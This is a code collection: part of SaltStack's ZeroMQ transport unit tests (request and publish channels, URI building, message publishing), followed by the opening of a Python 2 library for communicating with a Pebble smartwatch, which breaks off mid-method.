cls.server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.evt = threading.Event()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.evt)
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
if not hasattr(cls, "_handle_payload"):
return
# Attempting to kill the children hangs the test suite.
# Let the test suite handle this instead.
cls.process_manager.stop_restarting()
cls.process_manager.kill_children()
cls.evt.set()
cls.server_thread.join()
time.sleep(
2
) # Give the procs a chance to fully close before we stop the io_loop
cls.server_channel.close()
del cls.server_channel
del cls.io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
class ClearReqTestCases(BaseZMQReqCase, ReqChannelMixin):
"""
Test all of the clear msg stuff
"""
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(
self.minion_config, crypt="clear"
)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@slowTest
def test_master_uri_override(self):
"""
ensure master_uri kwarg is respected
"""
# minion_config should be 127.0.0.1, we want a different uri that still connects
uri = "tcp://{master_ip}:{master_port}".format(
master_ip="localhost", master_port=self.minion_config["master_port"]
)
channel = salt.transport.client.ReqChannel.factory(
self.minion_config, master_uri=uri
)
self.assertIn("localhost", channel.master_uri)
del channel
@flaky
@not_runs_on(
kernel="linux",
os_familiy="Suse",
reason="Skipping until https://github.com/saltstack/salt/issues/32902 gets fixed",
)
class AESReqTestCases(BaseZMQReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# WARNING: This test will fail randomly on any system with > 1 CPU core!!!
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
@slowTest
def test_badload(self):
"""
Test a variety of bad requests, make sure that we get some sort of error
"""
# TODO: This test should be re-enabled when Jenkins moves to C7.
# Once the version of salt-testing is increased to something newer than the September
# release of salt-testing, the @flaky decorator should be applied to this test.
msgs = ["", [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg, timeout=5)
class BaseZMQPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.PubServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.evt = threading.Event()
cls.req_server_channel.post_fork(
cls._handle_payload, io_loop=cls._server_io_loop
)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls._server_io_loop, cls.evt)
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.process_manager.kill_children()
cls.process_manager.stop_restarting()
time.sleep(
2
) # Give the procs a chance to fully close before we stop the io_loop
cls.evt.set()
cls.server_thread.join()
cls.req_server_channel.close()
cls.server_channel.close()
cls._server_io_loop.stop()
del cls.server_channel
del cls._server_io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
def setUp(self):
super(BaseZMQPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseZMQPubCase, self).tearDown()
failures = []
for k, v in six.iteritems(self.io_loop._handlers):
if self._start_handlers.get(k) != v:
failures.append((k, v))
del self._start_handlers
if len(failures) > 0:
raise Exception("FDs still attached to the IOLoop: {0}".format(failures))
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseZMQPubCase, PubChannelMixin):
"""
Tests around the publish system
"""
def get_new_ioloop(self):
return salt.ext.tornado.ioloop.IOLoop()
class AsyncReqMessageClientPoolTest(TestCase):
def setUp(self):
super(AsyncReqMessageClientPoolTest, self).setUp()
sock_pool_size = 5
with patch(
"salt.transport.zeromq.AsyncReqMessageClient.__init__",
MagicMock(return_value=None),
):
self.message_client_pool = AsyncReqMessageClientPool(
{"sock_pool_size": sock_pool_size}, args=({}, "")
)
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [
MagicMock() for _ in range(sock_pool_size)
]
def tearDown(self):
del self.original_message_clients
super(AsyncReqMessageClientPoolTest, self).tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
class ZMQConfigTest(TestCase):
def test_master_uri(self):
"""
test _get_master_uri method
"""
m_ip = "127.0.0.1"
m_port = 4505
s_ip = "111.1.0.1"
s_port = 4058
m_ip6 = "1234:5678::9abc"
s_ip6 = "1234:5678::1:9abc"
with patch("salt.transport.zeromq.LIBZMQ_VERSION_INFO", (4, 1, 6)), patch(
"salt.transport.zeromq.ZMQ_VERSION_INFO", (16, 0, 1)
):
# pass in both source_ip and source_port
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_ip=s_ip, source_port=s_port
) == "tcp://{0}:{1};{2}:{3}".format(s_ip, s_port, m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port, source_ip=s_ip6, source_port=s_port
) == "tcp://[{0}]:{1};[{2}]:{3}".format(s_ip6, s_port, m_ip6, m_port)
# source ip and source_port empty
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port
) == "tcp://{0}:{1}".format(m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port
) == "tcp://[{0}]:{1}".format(m_ip6, m_port)
# pass in only source_ip
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_ip=s_ip
) == "tcp://{0}:0;{1}:{2}".format(s_ip, m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port, source_ip=s_ip6
) == "tcp://[{0}]:0;[{1}]:{2}".format(s_ip6, m_ip6, m_port)
# pass in only source_port
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_port=s_port
) == "tcp://0.0.0.0:{0};{1}:{2}".format(s_port, m_ip, m_port)
class PubServerChannel(TestCase, AdaptedConfigurationTestCaseMixin):
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
"sign_pub_messages": False,
}
)
salt.master.SMaster.secrets["aes"] = {
"secret": multiprocessing.Array(
ctypes.c_char, six.b(salt.crypt.Crypticle.generate_key_string()),
),
}
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"auth_timeout": 5,
"auth_tries": 1,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
@classmethod
def tearDownClass(cls):
del cls.minion_config
del cls.master_config
def setUp(self):
# Start the event loop, even though we don't directly use this with
# ZeroMQPubServerChannel, having it running seems to increase the
# likelihood of dropped messages.
self.io_loop = salt.ext.tornado.ioloop.IOLoop()
self.io_loop.make_current()
self.io_loop_thread = threading.Thread(target=self.io_loop.start)
self.io_loop_thread.start()
self.process_manager = salt.utils.process.ProcessManager(
name="PubServer_ProcessManager"
)
def tearDown(self):
self.io_loop.add_callback(self.io_loop.stop)
self.io_loop_thread.join()
self.process_manager.stop_restarting()
self.process_manager.kill_children()
del self.io_loop
del self.io_loop_thread
del self.process_manager
@staticmethod
def _gather_results(opts, pub_uri, results, timeout=120, messages=None):
"""
Gather results until the number of seconds specified by timeout passes
without receiving a message
"""
ctx = zmq.Context()
sock = ctx.socket(zmq.SUB)
sock.setsockopt(zmq.LINGER, -1)
sock.setsockopt(zmq.SUBSCRIBE, b"")
sock.connect(pub_uri)
last_msg = time.time()
serial = salt.payload.Serial(opts)
crypticle = salt.crypt.Crypticle(
opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
while time.time() - last_msg < timeout:
try:
payload = sock.recv(zmq.NOBLOCK)
except zmq.ZMQError:
time.sleep(0.01)
else:
if messages:
if messages != 1:
messages -= 1
continue
payload = crypticle.loads(serial.loads(payload)["load"])
if "stop" in payload:
break
last_msg = time.time()
results.append(payload["jid"])
@skipIf(salt.utils.platform.is_windows(), "Skip on Windows OS")
@slowTest
def test_publish_to_pubserv_ipc(self):
"""
Test sending 10K messages to ZeroMQPubServerChannel using IPC transport
ZMQ's ipc transport not supported on Windows
"""
opts = dict(self.master_config, ipc_mode="ipc", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 10000
expect = []
results = []
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
# Allow time for server channel to start, especially on windows
time.sleep(2)
for i in range(send_num):
expect.append(i)
load = {"tgt_type": "glob", "tgt": "*", "jid": i}
server_channel.publish(load)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@slowTest
def test_zeromq_publish_port(self):
"""
test that, when connecting, we
use the publish_port set in opts
when it's not 4506
"""
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
recon_randomize=False,
publish_port=455505,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
patch_socket = MagicMock(return_value=True)
patch_auth = MagicMock(return_value=True)
with patch.object(channel, "_socket", patch_socket), patch.object(
channel, "auth", patch_auth
):
channel.connect()
assert str(opts["publish_port"]) in patch_socket.mock_calls[0][1][0]
def test_zeromq_zeromq_filtering_decode_message_no_match(self):
"""
test AsyncZeroMQPubChannel _decode_messages when
zmq_filtering is enabled and the minion does not match
"""
message = [
b"4f26aeafdb2367620a393c973eddbe8f8b846eb",
b"\x82\xa3enc\xa3aes\xa4load\xda\x00`\xeeR\xcf"
b"\x0eaI#V\x17if\xcf\xae\x05\xa7\xb3bN\xf7\xb2\xe2"
b'\xd0sF\xd1\xd4\xecB\xe8\xaf"/*ml\x80Q3\xdb\xaexg'
b"\x8e\x8a\x8c\xd3l\x03\\,J\xa7\x01i\xd1:]\xe3\x8d"
b"\xf4\x03\x88K\x84\n`\xe8\x9a\xad\xad\xc6\x8ea\x15>"
b"\x92m\x9e\xc7aM\x11?\x18;\xbd\x04c\x07\x85\x99\xa3\xea[\x00D",
]
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
recon_randomize=False,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
server_channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
with patch(
"salt.crypt.AsyncAuth.crypticle",
MagicMock(return_value={"tgt_type": "glob", "tgt": "*", "jid": 1}),
) as mock_test:
res = server_channel._decode_messages(message)
assert res.result() is None
def test_zeromq_zeromq_filtering_decode_message(self):
"""
test AsyncZeroMQPubChannel _decode_messages
when zmq_filtering is enabled
"""
message = [
b"4f26aeafdb2367620a393c973eddbe8f8b846ebd",
b"\x82\xa3enc\xa3aes\xa4load\xda\x00`\xeeR\xcf"
b"\x0eaI#V\x17if\xcf\xae\x05\xa7\xb3bN\xf7\xb2\xe2"
b'\xd0sF\xd1\xd4\xecB\xe8\xaf"/*ml\x80Q3\xdb\xaexg'
b"\x8e\x8a\x8c\xd3l\x03\\,J\xa7\x01i\xd1:]\xe3\x8d"
b"\xf4\x03\x88K\x84\n`\xe8\x9a\xad\xad\xc6\x8ea\x15>"
b"\x92m\x9e\xc7aM\x11?\x18;\xbd\x04c\x07\x85\x99\xa3\xea[\x00D",
]
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
recon_randomize=False,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
server_channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
with patch(
"salt.crypt.AsyncAuth.crypticle",
MagicMock(return_value={"tgt_type": "glob", "tgt": "*", "jid": 1}),
) as mock_test:
res = server_channel._decode_messages(message)
assert res.result()["enc"] == "aes"
@skipIf(salt.utils.platform.is_windows(), "Skip on Windows OS")
@slowTest
def test_zeromq_filtering(self):
"""
Test sending messages to publisher using UDP
with zeromq_filtering enabled
"""
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
acceptance_wait_time=5,
)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 1
expect = []
results = []
gather = threading.Thread(
target=self._gather_results,
args=(self.minion_config, pub_uri, results,),
kwargs={"messages": 2},
)
gather.start()
# Allow time for server channel to start, especially on windows
time.sleep(2)
expect.append(send_num)
load = {"tgt_type": "glob", "tgt": "*", "jid": send_num}
with patch(
"salt.utils.minions.CkMinions.check_minions",
MagicMock(
return_value={
"minions": ["minion"],
"missing": [],
"ssh_minions": False,
}
),
):
server_channel.publish(load)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@slowTest
def test_publish_to_pubserv_tcp(self):
"""
Test sending 10K messages to ZeroMQPubServerChannel using TCP transport
"""
opts = dict(self.master_config, ipc_mode="tcp", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 10000
expect = []
results = []
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
# Allow time for server channel to start, especially on windows
time.sleep(2)
for i in range(send_num):
expect.append(i)
load = {"tgt_type": "glob", "tgt": "*", "jid": i}
server_channel.publish(load)
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@staticmethod
def _send_small(opts, sid, num=10):
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
for i in range(num):
load = {"tgt_type": "glob", "tgt": "*", "jid": "{}-{}".format(sid, i)}
server_channel.publish(load)
server_channel.close()
@staticmethod
def _send_large(opts, sid, num=10, size=250000 * 3):
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
for i in range(num):
load = {
"tgt_type": "glob",
"tgt": "*",
"jid": "{}-{}".format(sid, i),
"xdata": "0" * size,
}
server_channel.publish(load)
server_channel.close()
@slowTest
def test_issue_36469_tcp(self):
"""
Test sending both large and small messages to publisher using TCP
https://github.com/saltstack/salt/issues/36469
"""
opts = dict(self.master_config, ipc_mode="tcp", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
send_num = 10 * 4
expect = []
results = []
pub_uri = "tcp://{interface}:{publish_port}".format(**opts)
# Allow time for server channel to start, especially on windows
time.sleep(2)
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
with ThreadPoolExecutor(max_workers=4) as executor:
executor.submit(self._send_small, opts, 1)
executor.submit(self._send_small, opts, 2)
executor.submit(self._send_small, opts, 3)
executor.submit(self._send_large, opts, 4)
expect = ["{}-{}".format(a, b) for a in range(10) for b in (1, 2, 3, 4)]
time.sleep(0.1)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
|
pebble.py
|
#!/usr/bin/env python
import array
import binascii
import glob
import itertools
import json
import logging
import os
import serial
import signal
import stm32_crc
import struct
import threading
import time
import traceback
import uuid
import zipfile
from collections import OrderedDict
from LightBluePebble import LightBluePebble
from struct import pack, unpack
log = logging.getLogger()
logging.basicConfig(format='[%(levelname)-8s] %(message)s')
log.setLevel(logging.DEBUG)
DEFAULT_PEBBLE_ID = None #Triggers autodetection on unix-like systems
DEBUG_PROTOCOL = True
class PebbleBundle(object):
MANIFEST_FILENAME = 'manifest.json'
STRUCT_DEFINITION = [
'8s', # header
'2B', # struct version
'2B', # sdk version
'2B', # app version
'H', # size
'I', # offset
'I', # crc
'32s', # app name
'32s', # company name
'I', # icon resource id
'I', # symbol table address
'I', # flags
'I', # relocation list start
'I', # num relocation list entries
'16s' # uuid
]
def __init__(self, bundle_path):
bundle_abs_path = os.path.abspath(bundle_path)
if not os.path.exists(bundle_abs_path):
raise Exception("Bundle does not exist: " + bundle_path)
self.zip = zipfile.ZipFile(bundle_abs_path)
self.path = bundle_abs_path
self.manifest = None
self.header = None
self.app_metadata_struct = struct.Struct(''.join(self.STRUCT_DEFINITION))
self.app_metadata_length_bytes = self.app_metadata_struct.size
def get_manifest(self):
if (self.manifest):
return self.manifest
if self.MANIFEST_FILENAME not in self.zip.namelist():
raise Exception("Could not find {}; are you sure this is a PebbleBundle?".format(self.MANIFEST_FILENAME))
self.manifest = json.loads(self.zip.read(self.MANIFEST_FILENAME))
return self.manifest
def get_app_metadata(self):
if (self.header):
return self.header
app_manifest = self.get_manifest()['application']
app_bin = self.zip.open(app_manifest['name']).read()
header = app_bin[0:self.app_metadata_length_bytes]
values = self.app_metadata_struct.unpack(header)
self.header = {
'sentinel' : values[0],
'struct_version_major' : values[1],
'struct_version_minor' : values[2],
'sdk_version_major' : values[3],
'sdk_version_minor' : values[4],
'app_version_major' : values[5],
'app_version_minor' : values[6],
'app_size' : values[7],
'offset' : values[8],
'crc' : values[9],
'app_name' : values[10].rstrip('\0'),
'company_name' : values[11].rstrip('\0'),
'icon_resource_id' : values[12],
'symbol_table_addr' : values[13],
'flags' : values[14],
'relocation_list_index' : values[15],
'num_relocation_entries' : values[16],
'uuid' : uuid.UUID(bytes=values[17])
}
return self.header
def close(self):
self.zip.close()
def is_firmware_bundle(self):
return 'firmware' in self.get_manifest()
def is_app_bundle(self):
return 'application' in self.get_manifest()
def has_resources(self):
return 'resources' in self.get_manifest()
def get_firmware_info(self):
if not self.is_firmware_bundle():
return None
return self.get_manifest()['firmware']
def get_application_info(self):
if not self.is_app_bundle():
return None
return self.get_manifest()['application']
def get_resources_info(self):
if not self.has_resources():
return None
return self.get_manifest()['resources']
class EndpointSync():
timeout = 10
def __init__(self, pebble, endpoint):
pebble.register_endpoint(endpoint, self.callback)
self.marker = threading.Event()
def callback(self, *args):
self.data = args
self.marker.set()
def get_data(self):
try:
self.marker.wait(timeout=self.timeout)
return self.data[1]
except:
return False
class PebbleError(Exception):
def __init__(self, id, message):
self._id = id
self._message = message
def __str__(self):
return "%s (ID:%s)" % (self._message, self._id)
class Pebble(object):
"""
A connection to a Pebble watch; data and commands may be sent
to the watch through an instance of this class.
"""
endpoints = {
"TIME": 11,
"VERSION": 16,
"PHONE_VERSION": 17,
"SYSTEM_MESSAGE": 18,
"MUSIC_CONTROL": 32,
"PHONE_CONTROL": 33,
"APPLICATION_MESSAGE": 48,
"LAUNCHER": 49,
"LOGS": 2000,
"PING": 2001,
"LOG_DUMP": 2002,
"RESET": 2003,
"APP": 2004,
"APP_LOGS": 2006,
"NOTIFICATION": 3000,
"RESOURCE": 4000,
"APP_MANAGER": 6000,
"PUTBYTES": 48879
}
log_levels = {
0: "*",
1: "E",
50: "W",
100: "I",
200: "D",
250: "V"
}
bridges = {}
@staticmethod
def AutodetectDevice():
if os.name != "posix": #i.e. Windows
raise NotImplementedError("Autodetection is only implemented on UNIX-like systems.")
pebbles = glob.glob("/dev/tty.Pebble????-SerialPortSe")
if len(pebbles) == 0:
raise PebbleError(None, "Autodetection could not find any Pebble devices")
elif len(pebbles) > 1:
log.warn("Autodetect found %d Pebbles; using most recent" % len(pebbles))
#NOTE: Not entirely sure if this is the correct approach
pebbles.sort(key=lambda x: os.stat(x).st_mtime, reverse=True)
id = pebbles[0][15:19]
log.info("Autodetect found a Pebble with ID %s" % id)
return id
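# Illustrative note (added): with the glob pattern above, a device file such as
# "/dev/tty.Pebble7F3A-SerialPortSe" (hypothetical) yields id "7F3A", i.e. the
# four characters at positions [15:19] of the path.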
def __init__(self, id = None, using_lightblue = True, pair_first = False):
if id is None and not using_lightblue:
id = Pebble.AutodetectDevice()
self.id = id
self.using_lightblue = using_lightblue
self._alive = True
self._endpoint_handlers = {}
self._internal_endpoint_handlers = {
self.endpoints["TIME"]: self._get_time_response,
self.endpoints["VERSION"]: self._version_response,
self.endpoints["PHONE_VERSION"]: self._phone_version_response,
self.endpoints["SYSTEM_MESSAGE"]: self._system_message_response,
self.endpoints["MUSIC_CONTROL"]: self._music_control_response,
self.endpoints["APPLICATION_MESSAGE"]: self._application_message_response,
self.endpoints["LAUNCHER"]: self._application_message_response,
self.endpoints["LOGS"]: self._log_response,
self.endpoints["PING"]: self._ping_response,
self.endpoints["APP_LOGS"]: self._app_log_response,
self.endpoints["APP_MANAGER"]: self._appbank_status_response
}
try:
if using_lightblue:
self._ser = LightBluePebble(self.id, pair_first)
signal.signal(signal.SIGINT, self._exit_signal_handler)
else:
devicefile = "/dev/tty.Pebble"+id+"-SerialPortSe"
log.debug("Attempting to open %s as Pebble device %s" % (devicefile, id))
self._ser = serial.Serial(devicefile, 115200, timeout=1)
log.debug("Initializing reader thread")
self._read_thread = threading.Thread(target=self._reader)
self._read_thread.setDaemon(True)
self._read_thread.start()
log.debug("Reader thread loaded on tid %s" % self._read_thread.name)
except PebbleError:
raise PebbleError(id, "Failed to connect to Pebble")
except:
raise
def _exit_signal_handler(self, signum, frame):
print "Disconnecting before exiting..."
self.disconnect()
time.sleep(1)
os._exit(0)
def __del__(self):
try:
self._ser.close()
except:
pass
def _reader(self):
try:
while self._alive:
endpoint, resp = self._recv_message()
if resp == None:
continue
if endpoint in self._internal_endpoint_handlers:
resp = self._internal_endpoint_handlers[endpoint](endpoint, resp)
if endpoint in self._endpoint_handlers and resp:
self._endpoint_handlers[endpoint](endpoint, resp)
except:
traceback.print_exc()
raise PebbleError(self.id, "Lost connection to Pebble")
self._alive = False
def _pack_message_data(self, lead, parts):
pascal = map(lambda x: x[:255], parts)
d = pack("b" + reduce(lambda x,y: str(x) + "p" + str(y), map(lambda x: len(x) + 1, pascal)) + "p", lead, *pascal)
return d
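# Illustrative note (added): _pack_message_data packs a lead byte followed by
# each part as a length-prefixed (Pascal) string capped at 255 bytes, e.g.
# _pack_message_data(1, ["Jane", "Hello"]) == b'\x01\x04Jane\x05Hello'.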
def _build_message(self, endpoint, data):
return pack("!HH", len(data), endpoint)+data
def _send_message(self, endpoint, data, callback = None):
if endpoint not in self.endpoints:
raise PebbleError(self.id, "Invalid endpoint specified")
msg = self._build_message(self.endpoints[endpoint], data)
if DEBUG_PROTOCOL:
log.debug('>>> ' + msg.encode('hex'))
self._ser.write(msg)
def _recv_message(self):
if self.using_lightblue:
try:
endpoint, resp, data = self._ser.read()
if resp is None:
return None, None
except TypeError:
# the lightblue process has likely shutdown and cannot be read from
self._alive = False
return None, None
else:
data = self._ser.read(4)
if len(data) == 0:
return (None, None)
elif len(data) < 4:
raise PebbleError(self.id, "Malformed response with length "+str(len(data)))
size, endpoint = unpack("!HH", data)
resp = self._ser.read(size)
if DEBUG_PROTOCOL:
log.debug("Got message for endpoint %s of length %d" % (endpoint, len(resp)))
log.debug('<<< ' + (data + resp).encode('hex'))
return (endpoint, resp)
def register_endpoint(self, endpoint_name, func):
if endpoint_name not in self.endpoints:
raise PebbleError(self.id, "Invalid endpoint specified")
endpoint = self.endpoints[endpoint_name]
self._endpoint_handlers[endpoint] = func
def notification_sms(self, sender, body):
"""Send a 'SMS Notification' to the displayed on the watch."""
ts = str(int(time.time())*1000)
parts = [sender, body, ts]
self._send_message("NOTIFICATION", self._pack_message_data(1, parts))
def notification_email(self, sender, subject, body):
"""Send an 'Email Notification' to the displayed on the watch."""
ts = str(int(time.time())*1000)
parts = [sender, body, ts, subject]
self._send_message("NOTIFICATION", self._pack_message_data(0, parts))
def set_nowplaying_metadata(self, track, album, artist):
"""Update the song metadata displayed in Pebble's music app."""
parts = [artist[:30], album[:30], track[:30]]
self._send_message("MUSIC_CONTROL", self._pack_message_data(16, parts))
def get_versions(self, async = False):
"""
Retrieve a summary of version information for various software
(firmware, bootloader, etc) running on the watch.
"""
self._send_message("VERSION", "\x00")
if not async:
return EndpointSync(self, "VERSION").get_data()
def get_appbank_status(self, async = False):
"""
Retrieve a list of all installed watch-apps.
This is particularly useful when trying to locate a
free app-bank to use when installing a new watch-app.
"""
self._send_message("APP_MANAGER", "\x01")
if not async:
return EndpointSync(self, "APP_MANAGER").get_data()
def remove_app(self, appid, index, async=False):
"""Remove an installed application from the target app-bank."""
data = pack("!bII", 2, appid, index)
self._send_message("APP_MANAGER", data)
if not async:
return EndpointSync(self, "APP_MANAGER").get_data()
def remove_app_by_uuid(self, uuid_to_remove, uuid_is_string=True, async = False):
"""Remove an installed application by UUID."""
if uuid_is_string:
uuid_to_remove = uuid_to_remove.decode('hex')
elif type(uuid_to_remove) is uuid.UUID:
uuid_to_remove = uuid_to_remove.bytes
# else, assume it's a byte array
data = pack("b", 0x02) + str(uuid_to_remove)
self._send_message("APP_MANAGER", data)
if not async:
return EndpointSync(self, "APP_MANAGER").get_data()
def get_time(self, async = False):
"""Retrieve the time from the Pebble's RTC."""
self._send_message("TIME", "\x00")
if not async:
return EndpointSync(self, "TIME").get_data()
def set_time(self, timestamp):
"""Set the time stored in the target Pebble's RTC."""
data = pack("!bL", 2, timestamp)
self._send_message("TIME", data)
def reinstall_app(self, pbz_path, launch_on_install=True):
"""
A convenience method to uninstall and then install an app.
If uninstallation by UUID fails, the app name from the metadata will be used.
"""
def endpoint_check(result, pbz_path):
if result == 'app removed':
print result
return True
else:
if DEBUG_PROTOCOL:
log.warn("Failed to remove supplied app, app manager message was: " + result)
return False
# get the bundle's metadata to identify the app being replaced
bundle = PebbleBundle(pbz_path)
if not bundle.is_app_bundle():
raise PebbleError(self.id, "This is not an app bundle")
app_metadata = bundle.get_app_metadata()
# attempt to remove an app by its UUID
result_uuid = self.remove_app_by_uuid(app_metadata['uuid'].bytes, uuid_is_string=False)
if endpoint_check(result_uuid, pbz_path):
return self.install_app(pbz_path, launch_on_install)
if DEBUG_PROTOCOL:
